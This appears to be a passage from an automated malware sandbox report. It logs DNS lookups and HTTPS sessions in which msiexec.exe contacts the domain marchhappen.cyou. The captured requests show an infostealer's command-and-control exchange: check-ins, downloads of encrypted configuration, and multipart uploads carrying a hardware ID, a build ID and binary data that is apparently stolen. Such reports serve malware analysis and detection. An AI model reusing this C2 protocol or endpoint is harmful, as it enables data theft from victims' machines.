                                                                                            Nov 25, 2024 10:54:48.902173042 CET1.1.1.1192.168.2.40x818dNo error (0)rentry.co104.26.3.16A (IP address)IN (0x0001)false
                                                                                            Nov 25, 2024 10:54:48.902173042 CET1.1.1.1192.168.2.40x818dNo error (0)rentry.co104.26.2.16A (IP address)IN (0x0001)false

                                                                                            HTTP Request Dependency Graph

                                                                                            • marchhappen.cyou
                                                                                            • rentry.co

                                                                                            HTTPS Proxied Packets

                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            0192.168.2.449736104.21.2.2244432232C:\Windows\SysWOW64\msiexec.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-11-25 09:54:27 UTC263OUTPOST /api HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                            Content-Length: 8
                                                                                            Host: marchhappen.cyou
                                                                                            2024-11-25 09:54:27 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                            Data Ascii: act=life
                                                                                            2024-11-25 09:54:27 UTC1007INHTTP/1.1 200 OK
                                                                                            Date: Mon, 25 Nov 2024 09:54:27 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Set-Cookie: PHPSESSID=ti413q86av6eo8jalc49gqg6rf; expires=Fri, 21-Mar-2025 03:41:06 GMT; Max-Age=9999999; path=/
                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            cf-cache-status: DYNAMIC
                                                                                            vary: accept-encoding
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fWXpWVHKUb7gOSALH%2BEJWNMYxAMYFcTVQzmfV9q4dMqnOTTvHVYXPzLcRTCB2q2P3TEt6lBAmyrecUMpCh9h29H%2BwmRkH79cIonOFww9uFerhnq3P8RrEI6MD6mZccfZJ%2F0E"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8e80c1e9ae2342d2-EWR
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1748&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=907&delivery_rate=1675272&cwnd=227&unsent_bytes=0&cid=b1991bda46d070c2&ts=733&x=0"
                                                                                            2024-11-25 09:54:27 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                            Data Ascii: 2ok
                                                                                            2024-11-25 09:54:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            1192.168.2.449737104.21.2.2244432232C:\Windows\SysWOW64\msiexec.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-11-25 09:54:29 UTC264OUTPOST /api HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                            Content-Length: 49
                                                                                            Host: marchhappen.cyou
                                                                                            2024-11-25 09:54:29 UTC49OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4d 65 48 64 79 34 2d 2d 70 6c 38 76 73 30 36 26 6a 3d
                                                                                            Data Ascii: act=recive_message&ver=4.0&lid=MeHdy4--pl8vs06&j=
                                                                                            2024-11-25 09:54:30 UTC1009INHTTP/1.1 200 OK
                                                                                            Date: Mon, 25 Nov 2024 09:54:30 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Set-Cookie: PHPSESSID=faucnbpt3nas5jobj0cpkmtijf; expires=Fri, 21-Mar-2025 03:41:09 GMT; Max-Age=9999999; path=/
                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            cf-cache-status: DYNAMIC
                                                                                            vary: accept-encoding
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=He95gKQnpYiFfuVBMaTgWpaqok3wLlsCya8Ytjr9s9UC4CJtg2fMS8bvsrah%2FqhVR3DeXcFk6ZmP3U8h%2B81WkfJ5tvV3%2BaQ7Lu24WMRrPiQVDolHfJKR0L%2Bcuowh7XUbBLlg"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8e80c1fa598e431f-EWR
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2152&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2840&recv_bytes=949&delivery_rate=1340064&cwnd=248&unsent_bytes=0&cid=d93d5ac60b23598b&ts=764&x=0"
                                                                                            2024-11-25 09:54:30 UTC360INData Raw: 34 65 33 0d 0a 2b 48 67 61 31 56 42 6e 66 4c 4f 75 45 46 42 70 70 46 59 50 63 5a 59 73 35 46 33 69 59 30 52 56 50 75 6d 61 79 50 6f 34 55 33 43 44 57 6d 7a 33 61 6c 4e 51 6b 64 31 31 63 6c 50 51 4a 48 6f 55 75 67 36 46 4f 63 42 5a 49 6a 52 53 6d 76 2f 6b 32 45 34 2b 55 73 49 65 65 37 6b 6a 41 6c 43 52 79 32 68 79 55 2f 38 74 4c 52 54 34 44 74 35 2f 68 77 6b 6d 4e 46 4b 4c 2b 36 4f 56 53 44 38 54 6b 42 52 39 76 54 55 45 47 4e 4c 43 66 54 55 4d 77 54 64 6c 48 2f 39 42 6a 44 44 41 54 32 59 77 52 4d 75 67 36 72 64 64 4a 78 47 31 47 57 6d 2b 63 68 70 51 79 49 78 31 50 6b 75 65 64 47 34 55 39 45 43 43 4f 59 6b 4c 4c 44 31 61 69 76 36 69 69 6c 45 31 47 4a 41 61 66 72 77 2f 44 51 7a 66 79 48 6f 2b 43 73 73 33 4c 56 32 30 53 5a 35 2f 32 45 46 31 42 56 2b 61 36 62
                                                                                            Data Ascii: 4e3+Hga1VBnfLOuEFBppFYPcZYs5F3iY0RVPumayPo4U3CDWmz3alNQkd11clPQJHoUug6FOcBZIjRSmv/k2E4+UsIee7kjAlCRy2hyU/8tLRT4Dt5/hwkmNFKL+6OVSD8TkBR9vTUEGNLCfTUMwTdlH/9BjDDAT2YwRMug6rddJxG1GWm+chpQyIx1PkuedG4U9ECCOYkLLD1aiv6iilE1GJAafrw/DQzfyHo+Css3LV20SZ5/2EF1BV+a6b
                                                                                            2024-11-25 09:54:30 UTC898INData Raw: 35 44 74 51 2f 5a 42 37 35 54 6f 73 31 6a 77 49 6d 4d 46 61 42 39 36 43 63 56 7a 77 55 6d 68 6f 34 2b 58 49 43 42 70 47 55 4d 68 45 4f 31 6a 4e 68 42 62 5a 30 78 69 44 4f 47 47 59 77 55 4d 75 67 36 70 42 66 4d 68 47 52 46 58 75 2f 4f 52 63 65 77 38 70 2f 4e 78 6e 41 4d 57 4d 5a 39 31 79 4d 4d 59 59 43 4c 7a 78 56 6a 76 2b 75 32 42 52 78 46 59 4a 61 49 50 63 54 43 42 58 64 78 6d 55 79 53 39 6c 36 64 46 50 7a 51 73 5a 6e 77 41 55 6e 4d 31 32 50 39 71 53 63 56 6a 63 63 6c 78 56 2b 76 54 49 43 46 4e 6e 45 63 7a 38 41 79 54 52 6f 48 76 42 49 69 6a 36 46 51 57 68 33 57 35 4f 34 38 74 68 30 4e 68 47 49 57 45 32 30 50 41 73 5a 78 34 78 74 66 42 4b 47 4d 32 46 54 72 41 36 49 4f 6f 38 54 4a 79 56 5a 68 65 71 6d 6e 56 77 38 45 5a 51 61 66 62 41 2f 43 78 6a 57 7a 33
                                                                                            Data Ascii: 5DtQ/ZB75Tos1jwImMFaB96CcVzwUmho4+XICBpGUMhEO1jNhBbZ0xiDOGGYwUMug6pBfMhGRFXu/ORcew8p/NxnAMWMZ91yMMYYCLzxVjv+u2BRxFYJaIPcTCBXdxmUyS9l6dFPzQsZnwAUnM12P9qScVjcclxV+vTICFNnEcz8AyTRoHvBIij6FQWh3W5O48th0NhGIWE20PAsZx4xtfBKGM2FTrA6IOo8TJyVZheqmnVw8EZQafbA/CxjWz3
                                                                                            2024-11-25 09:54:30 UTC1369INData Raw: 33 66 38 39 0d 0a 67 41 63 6f 36 66 78 37 2b 53 34 67 7a 68 51 34 6d 4e 6c 32 46 38 71 48 59 46 48 45 56 67 6c 6f 67 39 78 30 49 44 73 50 47 65 53 4e 4a 38 7a 64 6a 48 66 4e 59 78 69 44 4f 47 47 59 77 55 4d 75 67 36 70 4e 63 50 52 36 61 48 47 71 35 50 52 63 55 77 38 68 38 4e 67 66 49 50 57 41 63 38 56 79 43 50 35 49 41 49 7a 42 53 68 75 71 76 32 42 52 78 46 59 4a 61 49 50 63 49 4d 52 6e 42 33 58 56 77 50 73 55 36 59 78 54 69 44 70 6c 78 6d 55 45 68 4f 78 7a 54 75 4b 6d 55 56 7a 67 58 6c 51 68 79 75 7a 4d 58 47 64 6a 46 65 44 4d 46 79 54 39 68 46 75 5a 46 69 54 65 50 41 43 73 36 56 34 2f 34 36 74 59 61 4e 67 72 61 51 6a 69 57 50 77 6f 4d 30 74 30 77 42 77 6a 49 4f 6d 6f 46 74 46 48 49 4a 73 41 47 4b 6e 63 45 79 2f 6d 6d 6c 46 73 2b 46 4a 41 53 65 37 59 67
                                                                                            Data Ascii: 3f89gAco6fx7+S4gzhQ4mNl2F8qHYFHEVglog9x0IDsPGeSNJ8zdjHfNYxiDOGGYwUMug6pNcPR6aHGq5PRcUw8h8NgfIPWAc8VyCP5IAIzBShuqv2BRxFYJaIPcIMRnB3XVwPsU6YxTiDplxmUEhOxzTuKmUVzgXlQhyuzMXGdjFeDMFyT9hFuZFiTePACs6V4/46tYaNgraQjiWPwoM0t0wBwjIOmoFtFHIJsAGKncEy/mmlFs+FJASe7Yg
                                                                                            2024-11-25 09:54:30 UTC1369INData Raw: 46 35 50 41 58 50 4f 47 55 66 38 31 79 4c 4f 6f 67 4c 4c 7a 4a 51 68 76 75 34 6d 31 74 78 58 4e 6f 64 59 50 64 71 52 54 6e 69 2b 31 46 79 46 49 67 74 4c 52 54 34 44 74 35 2f 67 51 6b 68 4f 56 69 5a 39 72 69 57 58 54 45 55 6b 68 4a 2f 75 7a 77 4c 44 4e 6e 4e 63 6a 77 45 7a 6a 31 70 45 76 42 4b 69 6a 6a 41 54 32 59 77 52 4d 75 67 36 72 42 5a 4b 77 6a 59 4e 48 4f 33 4e 52 55 49 79 6f 78 74 66 42 4b 47 4d 32 46 54 72 41 36 43 4e 49 6f 49 4a 54 35 59 68 76 69 6a 6c 31 4d 35 48 35 49 49 65 62 30 67 41 52 76 51 77 33 67 32 41 38 6f 37 59 52 66 6d 52 63 5a 78 77 41 59 2b 64 77 54 4c 32 4b 47 4f 65 53 4d 41 32 67 55 32 72 6e 49 43 45 70 47 55 4d 6a 73 48 78 7a 56 6e 46 66 39 4c 69 7a 2b 46 43 79 45 37 58 49 76 37 72 4a 35 58 4f 52 71 57 46 6e 75 36 4e 77 45 4d 77
                                                                                            Data Ascii: F5PAXPOGUf81yLOogLLzJQhvu4m1txXNodYPdqRTni+1FyFIgtLRT4Dt5/gQkhOViZ9riWXTEUkhJ/uzwLDNnNcjwEzj1pEvBKijjAT2YwRMug6rBZKwjYNHO3NRUIyoxtfBKGM2FTrA6CNIoIJT5Yhvijl1M5H5IIeb0gARvQw3g2A8o7YRfmRcZxwAY+dwTL2KGOeSMA2gU2rnICEpGUMjsHxzVnFf9Liz+FCyE7XIv7rJ5XORqWFnu6NwEMw
                                                                                            2024-11-25 09:54:30 UTC1369INData Raw: 4e 79 6a 6b 74 58 62 52 4a 6e 6e 2f 59 51 51 45 74 55 59 33 76 75 36 31 64 4d 55 50 61 42 54 61 75 63 67 49 53 6b 5a 51 79 50 77 66 4d 4f 57 67 58 2f 45 6d 46 50 6f 77 46 4b 7a 70 59 67 76 79 76 69 6b 67 33 48 4a 6f 56 64 72 67 2b 46 78 44 55 7a 48 35 79 52 59 59 7a 64 56 4f 73 44 72 63 6f 67 45 45 35 65 55 58 4c 2f 36 62 59 41 6e 45 64 6c 77 68 30 75 44 49 45 48 64 58 48 64 54 51 4e 78 7a 64 6f 45 50 46 49 68 7a 2b 4d 43 79 45 2f 56 6f 58 31 72 4a 78 63 4e 31 4c 55 57 6e 2b 76 63 6c 31 65 34 38 46 38 4f 77 6a 41 4f 58 73 37 78 51 36 5a 63 5a 6c 42 49 54 73 63 30 37 69 75 6b 31 49 39 46 35 49 66 65 62 38 34 44 52 48 65 33 6e 4d 39 41 73 45 2f 59 42 7a 36 53 34 67 74 68 77 6f 74 50 31 57 46 2f 75 72 57 47 6a 59 4b 32 6b 49 34 67 54 45 4c 46 63 44 44 63 54
                                                                                            Data Ascii: NyjktXbRJnn/YQQEtUY3vu61dMUPaBTaucgISkZQyPwfMOWgX/EmFPowFKzpYgvyvikg3HJoVdrg+FxDUzH5yRYYzdVOsDrcogEE5eUXL/6bYAnEdlwh0uDIEHdXHdTQNxzdoEPFIhz+MCyE/VoX1rJxcN1LUWn+vcl1e48F8OwjAOXs7xQ6ZcZlBITsc07iuk1I9F5Ifeb84DRHe3nM9AsE/YBz6S4gthwotP1WF/urWGjYK2kI4gTELFcDDcT
                                                                                            2024-11-25 09:54:30 UTC1369INData Raw: 4c 56 32 30 53 5a 35 2f 32 45 45 58 49 56 75 4d 39 2b 69 78 58 53 6f 54 6b 42 6c 7a 75 33 49 61 55 4d 69 4d 64 54 35 4c 6e 6e 52 67 48 2f 6c 4b 6c 44 4f 41 41 53 38 77 56 70 6e 33 70 5a 56 5a 4d 52 65 49 47 32 71 34 4f 51 41 64 31 63 4e 39 50 67 50 4d 64 43 4e 54 38 31 62 47 5a 38 41 74 4a 53 5a 57 79 64 2b 77 6a 6c 30 39 41 35 45 58 64 50 63 74 53 77 65 52 79 33 35 79 55 34 59 30 62 42 37 6d 53 34 63 31 69 67 77 75 4f 46 6d 4f 39 36 36 63 55 54 38 41 6c 42 56 34 73 54 6b 45 47 39 4c 48 65 44 77 43 31 48 51 6a 55 2f 4e 57 78 6d 66 41 4b 7a 30 32 55 59 65 36 68 4a 4e 4d 4e 6c 43 37 46 48 4f 77 50 68 4e 65 7a 6f 4a 72 63 67 7a 4b 64 44 56 54 2f 55 43 4b 50 49 63 4a 4c 6a 4a 63 67 50 69 6c 6b 6c 51 32 41 4a 41 57 63 71 55 39 42 68 50 56 77 58 67 33 41 74 51
                                                                                            Data Ascii: LV20SZ5/2EEXIVuM9+ixXSoTkBlzu3IaUMiMdT5LnnRgH/lKlDOAAS8wVpn3pZVZMReIG2q4OQAd1cN9PgPMdCNT81bGZ8AtJSZWyd+wjl09A5EXdPctSweRy35yU4Y0bB7mS4c1igwuOFmO966cUT8AlBV4sTkEG9LHeDwC1HQjU/NWxmfAKz02UYe6hJNMNlC7FHOwPhNezoJrcgzKdDVT/UCKPIcJLjJcgPilklQ2AJAWcqU9BhPVwXg3AtQ
                                                                                            2024-11-25 09:54:30 UTC1369INData Raw: 41 36 47 4f 34 77 43 49 54 6c 54 68 76 65 74 6b 31 55 37 48 49 67 56 66 62 38 2b 44 52 50 44 78 6e 67 67 41 73 38 35 59 78 76 6d 54 63 5a 78 77 41 59 2b 64 77 54 4c 79 71 43 62 56 69 63 66 6c 56 70 6e 2b 53 74 46 47 64 32 4d 4b 6e 49 5a 31 44 52 6d 45 2f 4e 41 6c 44 36 49 44 69 77 33 57 6f 44 79 71 5a 46 65 50 78 75 63 47 33 57 32 4d 77 55 62 30 63 56 67 50 30 75 49 64 47 6f 4c 74 42 62 47 43 49 77 4b 46 7a 52 4b 79 2b 66 6b 67 52 6f 32 48 74 70 43 4f 4c 59 67 43 42 62 56 7a 48 38 30 41 4d 63 31 62 68 50 30 54 59 59 36 69 77 34 67 4d 46 47 42 38 61 4f 4b 55 6a 55 41 6d 68 5a 38 39 33 78 46 47 63 6d 4d 4b 6e 49 37 78 54 39 68 45 2f 6c 62 78 69 44 4f 47 47 59 77 55 4d 75 67 36 70 42 52 4f 68 53 52 47 58 75 35 4f 51 38 52 33 73 5a 30 4e 41 50 44 4e 47 45 54
                                                                                            Data Ascii: A6GO4wCITlThvetk1U7HIgVfb8+DRPDxnggAs85YxvmTcZxwAY+dwTLyqCbVicflVpn+StFGd2MKnIZ1DRmE/NAlD6IDiw3WoDyqZFePxucG3W2MwUb0cVgP0uIdGoLtBbGCIwKFzRKy+fkgRo2HtpCOLYgCBbVzH80AMc1bhP0TYY6iw4gMFGB8aOKUjUAmhZ893xFGcmMKnI7xT9hE/lbxiDOGGYwUMug6pBROhSRGXu5OQ8R3sZ0NAPDNGET
                                                                                            2024-11-25 09:54:30 UTC1369INData Raw: 4b 51 42 6d 5a 35 48 49 32 34 38 73 67 55 63 52 61 4c 57 69 44 6e 59 46 35 4c 67 70 73 69 59 42 53 49 4c 53 30 46 74 42 62 55 63 63 41 54 5a 6d 38 63 7a 50 75 34 69 6c 77 79 42 4a 6c 64 52 6f 6b 53 44 68 4c 53 77 48 4d 31 53 34 68 30 59 6c 4f 73 64 38 59 38 6b 68 4e 70 4a 6b 71 47 36 4b 33 55 55 69 41 66 6c 6c 6f 32 39 33 34 42 46 64 33 4a 64 53 4a 45 31 43 52 6d 48 2b 49 43 67 69 33 41 54 32 59 6d 56 34 54 71 70 4a 38 56 49 41 53 58 43 6e 75 79 4e 55 6b 57 77 4d 46 2b 63 6b 57 47 49 57 59 66 38 6b 4f 54 63 4a 45 58 4a 53 46 62 78 2f 43 37 6c 56 5a 78 4c 64 52 61 59 50 64 71 52 53 76 53 77 6e 77 31 48 64 64 35 54 52 6a 34 54 59 6f 2b 68 30 46 6f 64 31 72 4c 6f 50 6e 57 47 6a 55 44 32 6b 49 6f 35 57 6c 51 54 59 61 63 49 43 31 46 33 33 52 37 55 36 77 63 79
                                                                                            Data Ascii: KQBmZ5HI248sgUcRaLWiDnYF5LgpsiYBSILS0FtBbUccATZm8czPu4ilwyBJldRokSDhLSwHM1S4h0YlOsd8Y8khNpJkqG6K3UUiAfllo2934BFd3JdSJE1CRmH+ICgi3AT2YmV4TqpJ8VIASXCnuyNUkWwMF+ckWGIWYf8kOTcJEXJSFbx/C7lVZxLdRaYPdqRSvSwnw1Hdd5TRj4TYo+h0Fod1rLoPnWGjUD2kIo5WlQTYacIC1F33R7U6wcy
                                                                                            2024-11-25 09:54:30 UTC1369INData Raw: 6d 62 78 7a 4d 39 71 65 5a 57 54 38 52 69 41 68 2b 74 43 51 47 57 65 2f 79 56 7a 38 47 77 7a 70 71 4c 63 70 76 6a 43 2b 4e 44 69 45 4a 59 72 7a 70 72 59 67 59 46 78 47 4d 47 54 6a 35 63 68 31 65 69 59 78 54 4f 42 76 4c 4f 32 70 54 75 67 36 43 66 39 68 42 41 7a 70 52 6a 76 61 74 32 6e 73 37 41 70 63 56 66 2f 64 38 52 52 4b 52 6c 44 49 7a 41 64 59 35 59 68 53 34 53 5a 77 34 77 45 39 6d 4f 52 7a 54 75 4b 75 53 53 6a 77 64 6e 56 5a 2b 75 54 78 46 41 5a 2f 56 4d 69 52 4c 6e 6d 63 6a 55 2b 59 4f 33 6e 2f 48 44 79 73 32 58 34 58 37 75 49 70 63 4d 67 53 5a 58 55 61 4a 46 77 67 54 31 4d 4a 31 44 44 58 6e 50 6e 30 65 2b 30 6e 45 48 34 63 58 4a 51 6c 69 76 4f 6d 74 69 42 67 58 45 59 77 5a 4f 50 6c 79 48 56 36 4a 6a 46 4d 34 47 38 73 37 61 6c 48 55 53 5a 41 38 77 45
                                                                                            Data Ascii: mbxzM9qeZWT8RiAh+tCQGWe/yVz8GwzpqLcpvjC+NDiEJYrzprYgYFxGMGTj5ch1eiYxTOBvLO2pTug6Cf9hBAzpRjvat2ns7ApcVf/d8RRKRlDIzAdY5YhS4SZw4wE9mORzTuKuSSjwdnVZ+uTxFAZ/VMiRLnmcjU+YO3n/HDys2X4X7uIpcMgSZXUaJFwgT1MJ1DDXnPn0e+0nEH4cXJQlivOmtiBgXEYwZOPlyHV6JjFM4G8s7alHUSZA8wE


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            2192.168.2.449738104.21.2.2244432232C:\Windows\SysWOW64\msiexec.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-11-25 09:54:32 UTC275OUTPOST /api HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: multipart/form-data; boundary=604ZQ9UOTHV
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                            Content-Length: 18123
                                                                                            Host: marchhappen.cyou
                                                                                            2024-11-25 09:54:32 UTC15331OUTData Raw: 2d 2d 36 30 34 5a 51 39 55 4f 54 48 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 38 41 32 32 36 38 41 34 32 31 37 46 46 34 38 32 33 41 37 46 44 44 43 39 35 42 33 43 33 36 41 0d 0a 2d 2d 36 30 34 5a 51 39 55 4f 54 48 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 36 30 34 5a 51 39 55 4f 54 48 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c 38 76 73 30 36 0d 0a 2d 2d 36 30 34 5a 51 39 55 4f 54 48 56 0d 0a 43 6f
                                                                                            Data Ascii: --604ZQ9UOTHVContent-Disposition: form-data; name="hwid"58A2268A4217FF4823A7FDDC95B3C36A--604ZQ9UOTHVContent-Disposition: form-data; name="pid"2--604ZQ9UOTHVContent-Disposition: form-data; name="lid"MeHdy4--pl8vs06--604ZQ9UOTHVCo
                                                                                            2024-11-25 09:54:32 UTC2792OUTData Raw: ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be 93 15
                                                                                            Data Ascii: 'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwm
                                                                                            2024-11-25 09:54:33 UTC1012INHTTP/1.1 200 OK
                                                                                            Date: Mon, 25 Nov 2024 09:54:33 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Set-Cookie: PHPSESSID=m86mbu1scodu3ckshi74ltthcs; expires=Fri, 21-Mar-2025 03:41:11 GMT; Max-Age=9999999; path=/
                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            cf-cache-status: DYNAMIC
                                                                                            vary: accept-encoding
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RekKRFPDEhpFBujxVk02LYryOb%2BDtRt5MZDkTDs7rW8QoX3rvHSV0DAAMO7MMRZBIKWS20KXzhqo1LgIybVqk6K%2BkhF3zudi7RhNv2R5yym4AGg8PvgxIDF7%2BIXVS%2BNzvi9g"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8e80c208ea93c331-EWR
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1749&sent=18&recv=22&lost=0&retrans=0&sent_bytes=2839&recv_bytes=19078&delivery_rate=1611479&cwnd=74&unsent_bytes=0&cid=b7154dc0b3333836&ts=885&x=0"
                                                                                            2024-11-25 09:54:33 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                            Data Ascii: eok 8.46.123.75
                                                                                            2024-11-25 09:54:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            3192.168.2.449739104.21.2.2244432232C:\Windows\SysWOW64\msiexec.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-11-25 09:54:34 UTC272OUTPOST /api HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: multipart/form-data; boundary=WAFYLO6NK
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                            Content-Length: 8732
                                                                                            Host: marchhappen.cyou
                                                                                            2024-11-25 09:54:34 UTC8732OUTData Raw: 2d 2d 57 41 46 59 4c 4f 36 4e 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 38 41 32 32 36 38 41 34 32 31 37 46 46 34 38 32 33 41 37 46 44 44 43 39 35 42 33 43 33 36 41 0d 0a 2d 2d 57 41 46 59 4c 4f 36 4e 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 57 41 46 59 4c 4f 36 4e 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c 38 76 73 30 36 0d 0a 2d 2d 57 41 46 59 4c 4f 36 4e 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69
                                                                                            Data Ascii: --WAFYLO6NKContent-Disposition: form-data; name="hwid"58A2268A4217FF4823A7FDDC95B3C36A--WAFYLO6NKContent-Disposition: form-data; name="pid"2--WAFYLO6NKContent-Disposition: form-data; name="lid"MeHdy4--pl8vs06--WAFYLO6NKContent-Di
                                                                                            2024-11-25 09:54:35 UTC1009INHTTP/1.1 200 OK
                                                                                            Date: Mon, 25 Nov 2024 09:54:35 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Set-Cookie: PHPSESSID=7gkdgcpjutit7122illi15qtj8; expires=Fri, 21-Mar-2025 03:41:14 GMT; Max-Age=9999999; path=/
                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            cf-cache-status: DYNAMIC
                                                                                            vary: accept-encoding
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uuJIGxNBIbE09Kb7eXtABJZyfJAHZapY9DhFgM0mofiHmNnl94HR6jkd%2BckLcwJgq7%2FgpEJtCuKgVsVEo8voeqg4vJeYx6RJbjghwqj%2BHlk7MkgidLY9jqLKj8R7I7tVID4i"}],"group":"cf-nel","max_age":604800}
